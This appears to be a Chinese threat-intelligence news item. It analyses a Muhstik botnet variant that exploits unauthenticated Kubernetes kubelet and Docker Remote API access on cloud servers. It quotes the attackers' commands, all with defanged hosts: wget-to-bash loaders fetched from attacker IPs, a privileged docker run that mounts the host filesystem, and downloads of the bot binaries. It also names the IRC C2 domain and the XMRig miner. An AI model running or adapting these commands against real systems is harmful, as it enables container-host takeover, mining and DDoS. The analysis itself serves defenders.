【安全资讯】Muhstik僵尸网络变种利用漏洞攻击云服务器
Muhstik僵尸网络新变种利用Kubernetes kubelet API未授权访问漏洞和Docker Remote API未授权访问漏洞攻击云服务器,利用漏洞攻击得手之后,Muhstik会安装IRC后门对失陷系统进行远程控制。随后可下发任意命令执行,包括下载安装挖矿模块、执行DDoS攻击等。
Muhstik僵尸网络在2018年被发现,其早期版本主要利用Drupal RCE漏洞(CVE-2018-7600),WebLogic反序列化RCE漏洞(CVE-2019-2725),WebLogic反序列化RCE漏洞(CVE-2017-10271)以及SSH弱口令爆破攻击传播。
利用Kubernetes Kubelet API未授权访问漏洞
Muhstik僵尸网络通过执行以下命令下载和执行bash脚本“kubepy”进行kubernetes服务扫描和攻击:
sh -c export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;wget -qO - hxxp://159.89.91.223/wp-content/themes/twentyseventeen/kubepy | bash > /dev/null 2>&1 &
kubepy安装扫描工具masscan对指定IP范围进行kubernetes服务的10250端口扫描探测。利用Kubelet API未授权访问漏洞对容器节点进行攻击、下载和执行恶意shell脚本。
利用Docker Remote API未授权访问漏洞
Docker Remote API未授权访问漏洞有严重风险,使用docker swarm管理的docker节点上开放一个TCP端口2375,绑定 IP 为: 0.0.0.0, 且暴露在公网上。导致攻击者可以远程管理该主机的 docker 容器,可启动、下载、重启镜像,甚至删除上面的容器。
Muhstik僵尸网络通过执行以下命令下载和执行bash脚本“dock”进行Docker服务扫描和攻击:
sh -c export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;wget -qO - hxxp://159.89.91.223/wp-content/themes/twentyseventeen/dock | bash > /dev/null 2>&1 &
针对获取到的攻击目标,利用Docker未授权访问漏洞进行攻击,成功后执行shell脚本d:
timeout -s SIGKILL 240 docker -H tcp://$IPADDR:$PORT run -d --privileged --net host -v /:/mnt alpine sh -c 'wget -qO - hxxp://34.66.229.152:80/wp-content/themes/twentyseventeen/d | sh; tail -f /dev/null' &
恶意shell脚本
恶意shell脚本负责下载植入muhstik僵尸网络木马dk32/dk86:
wget hxxp://159.89.91.223/.x/dk32 -O dk32; chmod +x dk32 ; chmod 700 dk32 ; ./dk32 &
wget hxxp://159.89.91.223/.x/dk86 -O dk86; chmod +x dk86 ; chmod 700 dk86 ; ./dk86 &
然后通过安装定时任务实现持久化,与IRC C2服务器dkrd.exposedbotnets.ru通信。最后通过执行shell下载XMRig挖矿木马xmra32进行挖矿计算。
失陷指标(IOC)10
这么重要的IOC情报,赶紧
登录
来看看吧~
0条评论
看了这么久,请
登录
,对他说点啥~
0
0
分享
微信扫一扫分享